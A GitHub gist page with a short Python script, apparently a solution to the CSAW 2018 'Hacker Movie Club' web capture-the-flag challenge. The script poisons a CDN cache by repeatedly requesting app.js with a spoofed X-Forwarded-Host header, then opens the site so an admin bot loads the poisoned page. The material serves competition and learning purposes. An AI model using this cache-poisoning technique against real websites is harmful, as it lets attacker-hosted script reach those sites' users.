poison.py - Hacker Movie Club ( Web challenge ) CSAW 2018
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from time import sleep | |
| import requests | |
| import webbrowser | |
| X_Forwarded_Host = 'my_server' | |
| while True: | |
| resp = requests.get("http://3fad5c9a76928974bc36ef08fb1dfa2c98e98740.hm.vulnerable.services/cdn/app.js", headers={'X-Forwarded-Host': X_Forwarded_Host}) | |
| print resp.headers | |
| sleep(0.5) | |
| if X_Forwarded_Host in resp.text: | |
| print resp.text | |
| break | |
| # Now we're sure that our entry has been put up in cache | |
| # So, just open the webbrowser, and report so that the admin | |
| # gets our cached page | |
| webbrowser.open('http://app.hm.vulnerable.services/') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment